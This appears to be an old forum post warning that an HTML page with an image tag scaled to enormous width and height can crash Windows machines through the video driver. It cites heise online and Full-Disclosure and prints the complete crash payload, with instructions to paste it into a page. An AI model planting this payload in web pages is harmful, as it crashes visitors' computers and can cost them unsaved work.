|
[Vulnerability Warning] Windows crashes because a "too big" picture in browser
A simple HTLM page is capable of crashing a windows pc.
When an image-tag in an HTML page is loaded and the size of the image is blown up with the WITH and HEIGHT attributes until a certain extend, the loaded image eats up so much recourses that the videodriver and the computer crashes (bluescreen, restart or freezes).
so, watch out for bad jokes with this vulnarability!
my source is a German site: heise online
and
The 'Full-disclosure' mailinglist
Next is an example of the code that 'causes the crashes.
It is extremely simple:
!!!! Warning: Use this code at your own risk. Save anything you are working on before trying out. !!!!
copy and paste in a HTML page.
point the "YourImage.jpg" to a real image.
PHP Code:
<HTML>
<BODY>
<IMG SRC="YourImage.jpg" width="9999999" height="9999999" />
</BODY>
</HTML>
__________________
Amerika by Franz Kafka
“As Karl Rossman, a poor boy of sixteen who had been packed off to America by his parents because a servant girl had seduced him and got herself a child by him, stood on the liner slowly entering the harbour of New York, a sudden burst of sunshine seemed to illumine the Statue of Liberty, so that he saw it in a new light, although he had sighted it long before. The arm with the sword rose up as if newly stretched aloft, and round the figure blew the free winds of heaven.”
|